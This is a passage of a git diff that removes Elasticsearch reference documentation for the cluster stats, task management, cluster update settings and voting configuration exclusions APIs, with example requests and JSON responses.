-`points_memory_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for points across all shards assigned to -selected nodes. - -`doc_values_memory`:: -(<>) -Total amount of memory used for doc values across all shards assigned to -selected nodes. - -`doc_values_memory_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for doc values across all shards assigned -to selected nodes. - -`index_writer_memory`:: -(<>) -Total amount of memory used by all index writers across all shards assigned to -selected nodes. - -`index_writer_memory_in_bytes`:: -(integer) -Total amount, in bytes, of memory used by all index writers across all shards -assigned to selected nodes. - -`version_map_memory`:: -(<>) -Total amount of memory used by all version maps across all shards assigned to -selected nodes. - -`version_map_memory_in_bytes`:: -(integer) -Total amount, in bytes, of memory used by all version maps across all shards -assigned to selected nodes. - -`fixed_bit_set`:: -(<>) -Total amount of memory used by fixed bit sets across all shards assigned to -selected nodes. -+ -Fixed bit sets are used for nested object field types and -type filters for <> fields. - -`fixed_bit_set_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used by fixed bit sets across all shards -assigned to selected nodes. - -`max_unsafe_auto_id_timestamp`:: -(integer) -{wikipedia}/Unix_time[Unix timestamp], in milliseconds, of -the most recently retried indexing request. - -`file_sizes`:: -(object) -This object is not populated by the cluster stats API. -+ -To get information on segment files, use the <>. -===== - -`mappings`:: -(object) -Contains statistics about <> in selected nodes. -+ -.Properties of `mappings` -[%collapsible%open] -===== -`field_types`:: -(array of objects) -Contains statistics about <> used in selected -nodes. -+ -.Properties of `field_types` objects -[%collapsible%open] -====== -`name`:: -(string) -Field data type used in selected nodes. - -`count`:: -(integer) -Number of fields mapped to the field data type in selected nodes. - -`index_count`:: -(integer) -Number of indices containing a mapping of the field data type in selected nodes. -====== -===== - -`analysis`:: -(object) -Contains statistics about <> -used in selected nodes. -+ -.Properties of `analysis` -[%collapsible%open] -===== -`char_filter_types`:: -(array of objects) -Contains statistics about <> types used -in selected nodes. -+ -.Properties of `char_filter_types` objects -[%collapsible%open] -====== -`name`:: -(string) -Character filter type used in selected nodes. - -`count`:: -(integer) -Number of analyzers or normalizers using the character filter type in selected -nodes. - -`index_count`:: -(integer) -Number of indices the character filter type in selected nodes. -====== - -`tokenizer_types`:: -(array of objects) -Contains statistics about <> types used in -selected nodes. -+ -.Properties of `tokenizer_types` objects -[%collapsible%open] -====== -`name`:: -(string) -Tokenizer type used in selected nodes. - -`count`:: -(integer) -Number of analyzers or normalizers using the tokenizer type in selected nodes. - -`index_count`:: -(integer) -Number of indices using the tokenizer type in selected nodes. -====== - -`filter_types`:: -(array of objects) -Contains statistics about <> types used in -selected nodes. -+ -.Properties of `filter_types` objects -[%collapsible%open] -====== -`name`:: -(string) -Token filter type used in selected nodes. - -`count`:: -(integer) -Number of analyzers or normalizers using the token filter type in selected -nodes. - -`index_count`:: -(integer) -Number of indices using the token filter type in selected nodes. -====== - -`analyzer_types`:: -(array of objects) -Contains statistics about <> types used in selected -nodes. -+ -.Properties of `analyzer_types` objects -[%collapsible%open] -====== -`name`:: -(string) -Analyzer type used in selected nodes. - -`count`:: -(integer) -Occurrences of the analyzer type in selected nodes. - -`index_count`:: -(integer) -Number of indices using the analyzer type in selected nodes. -====== - -`built_in_char_filters`:: -(array of objects) -Contains statistics about built-in <> -used in selected nodes. -+ -.Properties of `built_in_char_filters` objects -[%collapsible%open] -====== -`name`:: -(string) -Built-in character filter used in selected nodes. - -`count`:: -(integer) -Number of analyzers or normalizers using the built-in character filter in -selected nodes. - -`index_count`:: -(integer) -Number of indices using the built-in character filter in selected nodes. -====== - -`built_in_tokenizers`:: -(array of objects) -Contains statistics about built-in <> used in -selected nodes. -+ -.Properties of `built_in_tokenizers` objects -[%collapsible%open] -====== -`name`:: -(string) -Built-in tokenizer used in selected nodes. - -`count`:: -(integer) -Number of analyzers or normalizers using the built-in tokenizer in selected -nodes. - -`index_count`:: -(integer) -Number of indices using the built-in tokenizer in selected nodes. -====== - -`built_in_filters`:: -(array of objects) -Contains statistics about built-in <> used -in selected nodes. -+ -.Properties of `built_in_filters` objects -[%collapsible%open] -====== -`name`:: -(string) -Built-in token filter used in selected nodes. - -`count`:: -(integer) -Number of analyzers or normalizers using the built-in token filter in selected -nodes. - -`index_count`:: -(integer) -Number of indices using the built-in token filter in selected nodes. -====== - -`built_in_analyzers`:: -(array of objects) -Contains statistics about built-in <> used in -selected nodes. -+ -.Properties of `built_in_analyzers` objects -[%collapsible%open] -====== -`name`:: -(string) -Built-in analyzer used in selected nodes. - -`count`:: -(integer) -Occurrences of the built-in analyzer in selected nodes. - -`index_count`:: -(integer) -Number of indices using the built-in analyzer in selected nodes. -====== -===== -==== - -[[cluster-stats-api-response-body-nodes]] -`nodes`:: -(object) -Contains statistics about nodes selected by the request's <>. -+ -.Properties of `nodes` -[%collapsible%open] -==== -`count`:: -(object) -Contains counts for nodes selected by the request's <>. -+ -.Properties of `count` -[%collapsible%open] -===== -`total`:: -(integer) -Total number of selected nodes. - -`coordinating_only`:: -(integer) -Number of selected nodes without a <>. These nodes are -considered <> nodes. - -``:: -(integer) -Number of selected nodes with the role. For a list of roles, see -<>. -===== - -`versions`:: -(array of strings) -Array of {es} versions used on selected nodes. - -`os`:: -(object) -Contains statistics about the operating systems used by selected nodes. -+ -.Properties of `os` -[%collapsible%open] -===== -`available_processors`:: -(integer) -Number of processors available to JVM across all selected nodes. - -`allocated_processors`:: -(integer) -Number of processors used to calculate thread pool size across all selected -nodes. -+ -This number can be set with the `processors` setting of a node and defaults to -the number of processors reported by the OS. In both cases, this number will -never be larger than `32`. - -`names`:: -(array of objects) -Contains statistics about operating systems used by selected nodes. -+ -.Properties of `names` -[%collapsible%open] -====== -`name`::: -(string) -Name of an operating system used by one or more selected nodes. - -`count`::: -(string) -Number of selected nodes using the operating system. -====== - -`pretty_names`:: -(array of objects) -Contains statistics about operating systems used by selected nodes. -+ -.Properties of `pretty_names` -[%collapsible%open] -====== -`pretty_name`::: -(string) -Human-readable name of an operating system used by one or more selected nodes. - -`count`::: -(string) -Number of selected nodes using the operating system. -====== - -`mem`:: -(object) -Contains statistics about memory used by selected nodes. -+ -.Properties of `mem` -[%collapsible%open] -====== -`total`:: -(<>) -Total amount of physical memory across all selected nodes. - -`total_in_bytes`:: -(integer) -Total amount, in bytes, of physical memory across all selected nodes. - -`free`:: -(<>) -Amount of free physical memory across all selected nodes. - -`free_in_bytes`:: -(integer) -Amount, in bytes, of free physical memory across all selected nodes. - -`used`:: -(<>) -Amount of physical memory in use across all selected nodes. - -`used_in_bytes`:: -(integer) -Amount, in bytes, of physical memory in use across all selected nodes. - -`free_percent`:: -(integer) -Percentage of free physical memory across all selected nodes. - -`used_percent`:: -(integer) -Percentage of physical memory in use across all selected nodes. -====== -===== - -`process`:: -(object) -Contains statistics about processes used by selected nodes. -+ -.Properties of `process` -[%collapsible%open] -===== -`cpu`:: -(object) -Contains statistics about CPU used by selected nodes. -+ -.Properties of `cpu` -[%collapsible%open] -====== -`percent`:: -(integer) -Percentage of CPU used across all selected nodes. Returns `-1` if -not supported. -====== - -`open_file_descriptors`:: -(object) -Contains statistics about open file descriptors in selected nodes. -+ -.Properties of `open_file_descriptors` -[%collapsible%open] -====== -`min`:: -(integer) -Minimum number of concurrently open file descriptors across all selected nodes. -Returns `-1` if not supported. - -`max`:: -(integer) -Maximum number of concurrently open file descriptors allowed across all selected -nodes. Returns `-1` if not supported. - -`avg`:: -(integer) -Average number of concurrently open file descriptors. Returns `-1` if not -supported. -====== -===== - -`jvm`:: -(object) -Contains statistics about the Java Virtual Machines (JVMs) used by selected -nodes. -+ -.Properties of `jvm` -[%collapsible%open] -===== -`max_uptime`:: -(<>) -Uptime duration since JVM last started. - -`max_uptime_in_millis`:: -(integer) -Uptime duration, in milliseconds, since JVM last started. - -`versions`:: -(array of objects) -Contains statistics about the JVM versions used by selected nodes. -+ -.Properties of `versions` -[%collapsible%open] -====== -`version`:: -(string) -Version of JVM used by one or more selected nodes. - -`vm_name`:: -(string) -Name of the JVM. - -`vm_version`:: -(string) -Full version number of JVM. -+ -The full version number includes a plus sign (`+`) followed by the build number. - -`vm_vendor`:: -(string) -Vendor of the JVM. - -`bundled_jdk`:: -(Boolean) -If `true`, the JVM includes a bundled Java Development Kit (JDK). - -`using_bundled_jdk`:: -(Boolean) -If `true`, a bundled JDK is in use by JVM. - -`count`:: -(integer) -Total number of selected nodes using JVM. -====== - -`mem`:: -(object) -Contains statistics about memory used by selected nodes. -+ -.Properties of `mem` -[%collapsible%open] -====== -`heap_used`:: -(<>) -Memory currently in use by the heap across all selected nodes. - -`heap_used_in_bytes`:: -(integer) -Memory, in bytes, currently in use by the heap across all selected nodes. - -`heap_max`:: -(<>) -Maximum amount of memory, in bytes, available for use by the heap across all -selected nodes. - -`heap_max_in_bytes`:: -(integer) -Maximum amount of memory, in bytes, available for use by the heap across all -selected nodes. -====== - -`threads`:: -(integer) -Number of active threads in use by JVM across all selected nodes. -===== - -`fs`:: -(object) -Contains statistics about file stores by selected nodes. -+ -.Properties of `fs` -[%collapsible%open] -===== -`total`:: -(<>) -Total size of all file stores across all selected nodes. - -`total_in_bytes`:: -(integer) -Total size, in bytes, of all file stores across all seleced nodes. - -`free`:: -(<>) -Amount of unallocated disk space in file stores across all selected nodes. - -`free_in_bytes`:: -(integer) -Total number of unallocated bytes in file stores across all selected nodes. - -`available`:: -(<>) -Total amount of disk space available to JVM in file -stores across all selected nodes. -+ -Depending on OS or process-level restrictions, this amount may be less than -`nodes.fs.free`. This is the actual amount of free disk space the selected {es} -nodes can use. - -`available_in_bytes`:: -(integer) -Total number of bytes available to JVM in file stores -across all selected nodes. -+ -Depending on OS or process-level restrictions, this number may be less than -`nodes.fs.free_in_byes`. This is the actual amount of free disk space the -selected {es} nodes can use. -===== - -`plugins`:: -(array of objects) -Contains statistics about installed plugins and modules by selected nodes. -+ -If no plugins or modules are installed, this array is empty. -+ -.Properties of `plugins` -[%collapsible%open] -===== - -``:: -(object) -Contains statistics about an installed plugin or module. -+ -.Properties of `` -[%collapsible%open] -====== -`name`::: -(string) -Name of the {es} plugin. - -`version`::: -(string) -{es} version for which the plugin was built. - -`elasticsearch_version`::: -(string) -{es} version for which the plugin was built. - -`java_version`::: -(string) -Java version for which the plugin was built. - -`description`::: -(string) -Short description of the plugin. - -`classname`::: -(string) -Class name used as the plugin's entry point. - -`extended_plugins`::: -(array of strings) -An array of other plugins extended by this plugin through the Java Service -Provider Interface (SPI). -+ -If this plugin extends no other plugins, this array is empty. - -`has_native_controller`::: -(Boolean) -If `true`, the plugin has a native controller process. -====== -===== - -`network_types`:: -(object) -Contains statistics about the transport and HTTP networks used by selected -nodes. -+ -.Properties of `network_types` -[%collapsible%open] -===== -`transport_types`:: -(object) -Contains statistics about the transport network types used by selected nodes. -+ -.Properties of `transport_types` -[%collapsible%open] -====== -``:: -(integer) -Number of selected nodes using the transport type. -====== - -`http_types`:: -(object) -Contains statistics about the HTTP network types used by selected nodes. -+ -.Properties of `http_types` -[%collapsible%open] -====== -``:: -(integer) -Number of selected nodes using the HTTP type. -====== -===== - -`discovery_types`:: -(object) -Contains statistics about the <> used by selected nodes. -+ -.Properties of `discovery_types` -[%collapsible%open] -===== -``:: -(integer) -Number of selected nodes using the <> to find other nodes. -===== - -`packaging_types`:: -(array of objects) -Contains statistics about {es} distributions installed on selected nodes. -+ -.Properties of `packaging_types` -[%collapsible%open] -===== -`flavor`::: -(string) -Type of {es} distribution, such as `default` or `OSS`, used by one or more -selected nodes. - -`type`::: -(string) -File type, such as `tar` or `zip`, used for the distribution package. - -`count`::: -(integer) -Number of selected nodes using the distribution flavor and file type. -===== -==== - -[[cluster-stats-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /_cluster/stats?human&pretty --------------------------------------------------- -// TEST[setup:my_index] - -The API returns the following response: - -["source","js",subs="attributes,callouts"] --------------------------------------------------- -{ - "_nodes" : { - "total" : 1, - "successful" : 1, - "failed" : 0 - }, - "cluster_uuid": "YjAvIhsCQ9CbjWZb2qJw3Q", - "cluster_name": "elasticsearch", - "timestamp": 1459427693515, - "status": "green", - "indices": { - "count": 1, - "shards": { - "total": 5, - "primaries": 5, - "replication": 0, - "index": { - "shards": { - "min": 5, - "max": 5, - "avg": 5 - }, - "primaries": { - "min": 5, - "max": 5, - "avg": 5 - }, - "replication": { - "min": 0, - "max": 0, - "avg": 0 - } - } - }, - "docs": { - "count": 10, - "deleted": 0 - }, - "store": { - "size": "16.2kb", - "size_in_bytes": 16684, - "reserved": "0b", - "reserved_in_bytes": 0 - }, - "fielddata": { - "memory_size": "0b", - "memory_size_in_bytes": 0, - "evictions": 0 - }, - "query_cache": { - "memory_size": "0b", - "memory_size_in_bytes": 0, - "total_count": 0, - "hit_count": 0, - "miss_count": 0, - "cache_size": 0, - "cache_count": 0, - "evictions": 0 - }, - "completion": { - "size": "0b", - "size_in_bytes": 0 - }, - "segments": { - "count": 4, - "memory": "8.6kb", - "memory_in_bytes": 8898, - "terms_memory": "6.3kb", - "terms_memory_in_bytes": 6522, - "stored_fields_memory": "1.2kb", - "stored_fields_memory_in_bytes": 1248, - "term_vectors_memory": "0b", - "term_vectors_memory_in_bytes": 0, - "norms_memory": "384b", - "norms_memory_in_bytes": 384, - "points_memory" : "0b", - "points_memory_in_bytes" : 0, - "doc_values_memory": "744b", - "doc_values_memory_in_bytes": 744, - "index_writer_memory": "0b", - "index_writer_memory_in_bytes": 0, - "version_map_memory": "0b", - "version_map_memory_in_bytes": 0, - "fixed_bit_set": "0b", - "fixed_bit_set_memory_in_bytes": 0, - "max_unsafe_auto_id_timestamp" : -9223372036854775808, - "file_sizes": {} - }, - "mappings": { - "field_types": [] - }, - "analysis": { - "char_filter_types": [], - "tokenizer_types": [], - "filter_types": [], - "analyzer_types": [], - "built_in_char_filters": [], - "built_in_tokenizers": [], - "built_in_filters": [], - "built_in_analyzers": [] - } - }, - "nodes": { - "count": { - "total": 1, - "data": 1, - "coordinating_only": 0, - "master": 1, - "ingest": 1, - "voting_only": 0 - }, - "versions": [ - "{version}" - ], - "os": { - "available_processors": 8, - "allocated_processors": 8, - "names": [ - { - "name": "Mac OS X", - "count": 1 - } - ], - "pretty_names": [ - { - "pretty_name": "Mac OS X", - "count": 1 - } - ], - "mem" : { - "total" : "16gb", - "total_in_bytes" : 17179869184, - "free" : "78.1mb", - "free_in_bytes" : 81960960, - "used" : "15.9gb", - "used_in_bytes" : 17097908224, - "free_percent" : 0, - "used_percent" : 100 - } - }, - "process": { - "cpu": { - "percent": 9 - }, - "open_file_descriptors": { - "min": 268, - "max": 268, - "avg": 268 - } - }, - "jvm": { - "max_uptime": "13.7s", - "max_uptime_in_millis": 13737, - "versions": [ - { - "version": "12", - "vm_name": "OpenJDK 64-Bit Server VM", - "vm_version": "12+33", - "vm_vendor": "Oracle Corporation", - "bundled_jdk": true, - "using_bundled_jdk": true, - "count": 1 - } - ], - "mem": { - "heap_used": "57.5mb", - "heap_used_in_bytes": 60312664, - "heap_max": "989.8mb", - "heap_max_in_bytes": 1037959168 - }, - "threads": 90 - }, - "fs": { - "total": "200.6gb", - "total_in_bytes": 215429193728, - "free": "32.6gb", - "free_in_bytes": 35064553472, - "available": "32.4gb", - "available_in_bytes": 34802409472 - }, - "plugins": [ - { - "name": "analysis-icu", - "version": "{version}", - "description": "The ICU Analysis plugin integrates Lucene ICU module into elasticsearch, adding ICU relates analysis components.", - "classname": "org.elasticsearch.plugin.analysis.icu.AnalysisICUPlugin", - "has_native_controller": false - }, - ... - ], - "ingest": { - "number_of_pipelines" : 1, - "processor_stats": { - ... - } - }, - "network_types": { - ... - }, - "discovery_types": { - ... - }, - "packaging_types": [ - { - ... - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"plugins": \[[^\]]*\]/"plugins": $body.$_path/] -// TESTRESPONSE[s/"network_types": \{[^\}]*\}/"network_types": $body.$_path/] -// TESTRESPONSE[s/"discovery_types": \{[^\}]*\}/"discovery_types": $body.$_path/] -// TESTRESPONSE[s/"processor_stats": \{[^\}]*\}/"processor_stats": $body.$_path/] -// TESTRESPONSE[s/"count": \{[^\}]*\}/"count": $body.$_path/] -// TESTRESPONSE[s/"packaging_types": \[[^\]]*\]/"packaging_types": $body.$_path/] -// TESTRESPONSE[s/"field_types": \[[^\]]*\]/"field_types": $body.$_path/] -// TESTRESPONSE[s/: true|false/: $body.$_path/] -// TESTRESPONSE[s/: (\-)?[0-9]+/: $body.$_path/] -// TESTRESPONSE[s/: "[^"]*"/: $body.$_path/] -// These replacements do a few things: -// 1. Ignore the contents of the `plugins` object because we don't know all of -// the plugins that will be in it. And because we figure folks don't need to -// see an exhaustive list anyway. -// 2. Similarly, ignore the contents of `network_types`, `discovery_types`, and -// `packaging_types`. -// 3. Ignore the contents of the (nodes) count object, as what's shown here -// depends on the license. Voting-only nodes are e.g. only shown when this -// test runs with a basic license. -// 4. All of the numbers and strings on the right hand side of *every* field in -// the response are ignored. So we're really only asserting things about the -// the shape of this response, not the values in it. - -This API can be restricted to a subset of the nodes using <>: - -[source,console] --------------------------------------------------- -GET /_cluster/stats/nodes/node1,node*,master:false --------------------------------------------------- diff --git a/docs/reference/cluster/tasks.asciidoc b/docs/reference/cluster/tasks.asciidoc deleted file mode 100644 index 2994baf7204..00000000000 --- a/docs/reference/cluster/tasks.asciidoc +++ /dev/null @@ -1,327 +0,0 @@ -[[tasks]] -=== Task management API -++++ -Task management -++++ - -beta::["The task management API is new and should still be considered a beta feature. The API may change in ways that are not backwards compatible.",{es-issue}51628] - -Returns information about the tasks currently executing in the cluster. - -[[tasks-api-request]] -==== {api-request-title} - -`GET /_tasks/` - -`GET /_tasks` - -[[tasks-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[tasks-api-desc]] -==== {api-description-title} - -The task management API returns information -about tasks currently executing -on one or more nodes in the cluster. - - -[[tasks-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=task-id] - - -[[tasks-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=actions] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=detailed] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=group-by] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=node-id-query-parm] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=parent-task-id] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -`wait_for_completion`:: -(Optional, Boolean) If `true`, the request blocks until the operation is complete. -Defaults to `false`. - -[[tasks-api-response-codes]] -==== {api-response-codes-title} - -// tag::tasks-api-404[] -`404` (Missing resources):: -If `` is specified but not found, this code indicates that there -are no resources that match the request. -// end::tasks-api-404[] - -[[tasks-api-examples]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _tasks <1> -GET _tasks?nodes=nodeId1,nodeId2 <2> -GET _tasks?nodes=nodeId1,nodeId2&actions=cluster:* <3> --------------------------------------------------- -// TEST[skip:No tasks to retrieve] - -<1> Retrieves all tasks currently running on all nodes in the cluster. -<2> Retrieves all tasks running on nodes `nodeId1` and `nodeId2`. See <> for more info about how to select individual nodes. -<3> Retrieves all cluster-related tasks running on nodes `nodeId1` and `nodeId2`. - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "nodes" : { - "oTUltX4IQMOUUVeiohTt8A" : { - "name" : "H5dfFeA", - "transport_address" : "127.0.0.1:9300", - "host" : "127.0.0.1", - "ip" : "127.0.0.1:9300", - "tasks" : { - "oTUltX4IQMOUUVeiohTt8A:124" : { - "node" : "oTUltX4IQMOUUVeiohTt8A", - "id" : 124, - "type" : "direct", - "action" : "cluster:monitor/tasks/lists[n]", - "start_time_in_millis" : 1458585884904, - "running_time_in_nanos" : 47402, - "cancellable" : false, - "parent_task_id" : "oTUltX4IQMOUUVeiohTt8A:123" - }, - "oTUltX4IQMOUUVeiohTt8A:123" : { - "node" : "oTUltX4IQMOUUVeiohTt8A", - "id" : 123, - "type" : "transport", - "action" : "cluster:monitor/tasks/lists", - "start_time_in_millis" : 1458585884904, - "running_time_in_nanos" : 236042, - "cancellable" : false - } - } - } - } -} --------------------------------------------------- - -===== Retrieve information from a particular task - -It is also possible to retrieve information for a particular task. The following -example retrieves information about task `oTUltX4IQMOUUVeiohTt8A:124`: - -[source,console] --------------------------------------------------- -GET _tasks/oTUltX4IQMOUUVeiohTt8A:124 --------------------------------------------------- -// TEST[catch:missing] - -If the task isn't found, the API returns a 404. - -To retrieve all children of a particular task: - -[source,console] --------------------------------------------------- -GET _tasks?parent_task_id=oTUltX4IQMOUUVeiohTt8A:123 --------------------------------------------------- - -If the parent isn't found, the API does not return a 404. - - -===== Get more information about tasks - -You can also use the `detailed` request parameter to get more information about -the running tasks. This is useful for telling one task from another but is more -costly to execute. For example, fetching all searches using the `detailed` -request parameter: - -[source,console] --------------------------------------------------- -GET _tasks?actions=*search&detailed --------------------------------------------------- -// TEST[skip:No tasks to retrieve] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "nodes" : { - "oTUltX4IQMOUUVeiohTt8A" : { - "name" : "H5dfFeA", - "transport_address" : "127.0.0.1:9300", - "host" : "127.0.0.1", - "ip" : "127.0.0.1:9300", - "tasks" : { - "oTUltX4IQMOUUVeiohTt8A:464" : { - "node" : "oTUltX4IQMOUUVeiohTt8A", - "id" : 464, - "type" : "transport", - "action" : "indices:data/read/search", - "description" : "indices[test], types[test], search_type[QUERY_THEN_FETCH], source[{\"query\":...}]", - "start_time_in_millis" : 1483478610008, - "running_time_in_nanos" : 13991383, - "cancellable" : true - } - } - } - } -} --------------------------------------------------- - -The new `description` field contains human readable text that identifies the -particular request that the task is performing such as identifying the search -request being performed by a search task like the example above. Other kinds of -task have different descriptions, like <> which -has the search and the destination, or <> which just has the -number of requests and the destination indices. Many requests will only have an -empty description because more detailed information about the request is not -easily available or particularly helpful in identifying the request. - -[IMPORTANT] -============================== - -`_tasks` requests with `detailed` may also return a `status`. This is a report -of the internal status of the task. As such its format varies from task to task. -While we try to keep the `status` for a particular task consistent from version -to version this isn't always possible because we sometimes change the -implementation. In that case we might remove fields from the `status` for a -particular request so any parsing you do of the status might break in minor -releases. - -============================== - - -===== Wait for completion - -The task API can also be used to wait for completion of a particular task. The -following call will block for 10 seconds or until the task with id -`oTUltX4IQMOUUVeiohTt8A:12345` is completed. - -[source,console] --------------------------------------------------- -GET _tasks/oTUltX4IQMOUUVeiohTt8A:12345?wait_for_completion=true&timeout=10s --------------------------------------------------- -// TEST[catch:missing] - -You can also wait for all tasks for certain action types to finish. This command -will wait for all `reindex` tasks to finish: - -[source,console] --------------------------------------------------- -GET _tasks?actions=*reindex&wait_for_completion=true&timeout=10s --------------------------------------------------- - -[[task-cancellation]] -===== Task Cancellation - -If a long-running task supports cancellation, it can be cancelled with the cancel -tasks API. The following example cancels task `oTUltX4IQMOUUVeiohTt8A:12345`: - -[source,console] --------------------------------------------------- -POST _tasks/oTUltX4IQMOUUVeiohTt8A:12345/_cancel --------------------------------------------------- - -The task cancellation command supports the same task selection parameters as the -list tasks command, so multiple tasks can be cancelled at the same time. For -example, the following command will cancel all reindex tasks running on the -nodes `nodeId1` and `nodeId2`. - -`wait_for_completion`:: -(Optional, Boolean) If `true`, the request blocks until the cancellation of the -task and its descendant tasks is completed. Otherwise, the request can return soon -after the cancellation is started. Defaults to `false`. - -[source,console] --------------------------------------------------- -POST _tasks/_cancel?nodes=nodeId1,nodeId2&actions=*reindex --------------------------------------------------- - -===== Task Grouping - -The task lists returned by task API commands can be grouped either by nodes -(default) or by parent tasks using the `group_by` parameter. The following -command will change the grouping to parent tasks: - -[source,console] --------------------------------------------------- -GET _tasks?group_by=parents --------------------------------------------------- - -The grouping can be disabled by specifying `none` as a `group_by` parameter: - -[source,console] --------------------------------------------------- -GET _tasks?group_by=none --------------------------------------------------- - - -===== Identifying running tasks - -The `X-Opaque-Id` header, when provided on the HTTP request header, is going to -be returned as a header in the response as well as in the `headers` field for in -the task information. This allows to track certain calls, or associate certain -tasks with the client that started them: - -[source,sh] --------------------------------------------------- -curl -i -H "X-Opaque-Id: 123456" "http://localhost:9200/_tasks?group_by=parents" --------------------------------------------------- -//NOTCONSOLE - -The API returns the following result: - -[source,js] --------------------------------------------------- -HTTP/1.1 200 OK -X-Opaque-Id: 123456 <1> -content-type: application/json; charset=UTF-8 -content-length: 831 - -{ - "tasks" : { - "u5lcZHqcQhu-rUoFaqDphA:45" : { - "node" : "u5lcZHqcQhu-rUoFaqDphA", - "id" : 45, - "type" : "transport", - "action" : "cluster:monitor/tasks/lists", - "start_time_in_millis" : 1513823752749, - "running_time_in_nanos" : 293139, - "cancellable" : false, - "headers" : { - "X-Opaque-Id" : "123456" <2> - }, - "children" : [ - { - "node" : "u5lcZHqcQhu-rUoFaqDphA", - "id" : 46, - "type" : "direct", - "action" : "cluster:monitor/tasks/lists[n]", - "start_time_in_millis" : 1513823752750, - "running_time_in_nanos" : 92133, - "cancellable" : false, - "parent_task_id" : "u5lcZHqcQhu-rUoFaqDphA:45", - "headers" : { - "X-Opaque-Id" : "123456" <3> - } - } - ] - } - } -} --------------------------------------------------- -//NOTCONSOLE -<1> id as a part of the response header -<2> id for the tasks that was initiated by the REST request -<3> the child task of the task initiated by the REST request diff --git a/docs/reference/cluster/update-settings.asciidoc b/docs/reference/cluster/update-settings.asciidoc deleted file mode 100644 index 54f58696528..00000000000 --- a/docs/reference/cluster/update-settings.asciidoc +++ /dev/null @@ -1,143 +0,0 @@ -[[cluster-update-settings]] -=== Cluster update settings API -++++ -Cluster update settings -++++ - -Updates cluster-wide settings. - - -[[cluster-update-settings-api-request]] -==== {api-request-title} - -`PUT /_cluster/settings` - -[[cluster-update-settings-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage` -<> to use this API. - -[[cluster-update-settings-api-desc]] -==== {api-description-title} - -With specifications in the request body, this API call can update cluster -settings. Updates to settings can be persistent, meaning they apply across -restarts, or transient, where they don't survive a full cluster restart. - -You can reset persistent or transient settings by assigning a `null` value. If a -transient setting is reset, the first one of these values that is defined is -applied: - -* the persistent setting -* the setting in the configuration file -* the default value. - -The order of precedence for cluster settings is: - -1. transient cluster settings -2. persistent cluster settings -3. settings in the `elasticsearch.yml` configuration file. - -It's best to set all cluster-wide settings with the `settings` API and use the -`elasticsearch.yml` file only for local configurations. This way you can be sure that -the setting is the same on all nodes. If, on the other hand, you define different -settings on different nodes by accident using the configuration file, it is very -difficult to notice these discrepancies. - - -[[cluster-update-settings-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -`include_defaults`:: - (Optional, Boolean) If `true`, returns all default cluster settings. - Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[cluster-update-settings-api-example]] -==== {api-examples-title} - -An example of a persistent update: - -[source,console] --------------------------------------------------- -PUT /_cluster/settings -{ - "persistent" : { - "indices.recovery.max_bytes_per_sec" : "50mb" - } -} --------------------------------------------------- - - -An example of a transient update: - -[source,console] --------------------------------------------------- -PUT /_cluster/settings?flat_settings=true -{ - "transient" : { - "indices.recovery.max_bytes_per_sec" : "20mb" - } -} --------------------------------------------------- - - -The response to an update returns the changed setting, as in this response to -the transient example: - -[source,console-result] --------------------------------------------------- -{ - ... - "persistent" : { }, - "transient" : { - "indices.recovery.max_bytes_per_sec" : "20mb" - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"acknowledged": true,/] - - -This example resets a setting: - -[source,console] --------------------------------------------------- -PUT /_cluster/settings -{ - "transient" : { - "indices.recovery.max_bytes_per_sec" : null - } -} --------------------------------------------------- - - -The response does not include settings that have been reset: - -[source,console-result] --------------------------------------------------- -{ - ... - "persistent" : {}, - "transient" : {} -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"acknowledged": true,/] - - -You can also reset settings using wildcards. For example, to reset -all dynamic `indices.recovery` settings: - -[source,console] --------------------------------------------------- -PUT /_cluster/settings -{ - "transient" : { - "indices.recovery.*" : null - } -} --------------------------------------------------- diff --git a/docs/reference/cluster/voting-exclusions.asciidoc b/docs/reference/cluster/voting-exclusions.asciidoc deleted file mode 100644 index 021c1866240..00000000000 --- a/docs/reference/cluster/voting-exclusions.asciidoc +++ /dev/null @@ -1,95 +0,0 @@ -[[voting-config-exclusions]] -=== Voting configuration exclusions API -++++ -Voting configuration exclusions -++++ - -Adds or removes master-eligible nodes from the -<>. - - -[[voting-config-exclusions-api-request]] -==== {api-request-title} - -`POST /_cluster/voting_config_exclusions?node_names=` + - -`POST /_cluster/voting_config_exclusions?node_ids=` + - -`DELETE /_cluster/voting_config_exclusions` - -[[voting-config-exclusions-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage` -<> to use this API. - -[[voting-config-exclusions-api-desc]] -==== {api-description-title} - -By default, if there are more than three master-eligible nodes in the cluster -and you remove fewer than half of the master-eligible nodes in the cluster at -once, the <> automatically -shrinks. - -If you want to shrink the voting configuration to contain fewer than three nodes -or to remove half or more of the master-eligible nodes in the cluster at once, -you must use this API to remove departed nodes from the voting configuration -manually. It adds an entry for that node in the voting configuration exclusions -list. The cluster then tries to reconfigure the voting configuration to remove -that node and to prevent it from returning. - -If the API fails, you can safely retry it. Only a successful response -guarantees that the node has been removed from the voting configuration and will -not be reinstated. - -NOTE: Voting exclusions are required only when you remove at least half of the -master-eligible nodes from a cluster in a short time period. They are not -required when removing master-ineligible nodes or fewer than half of the 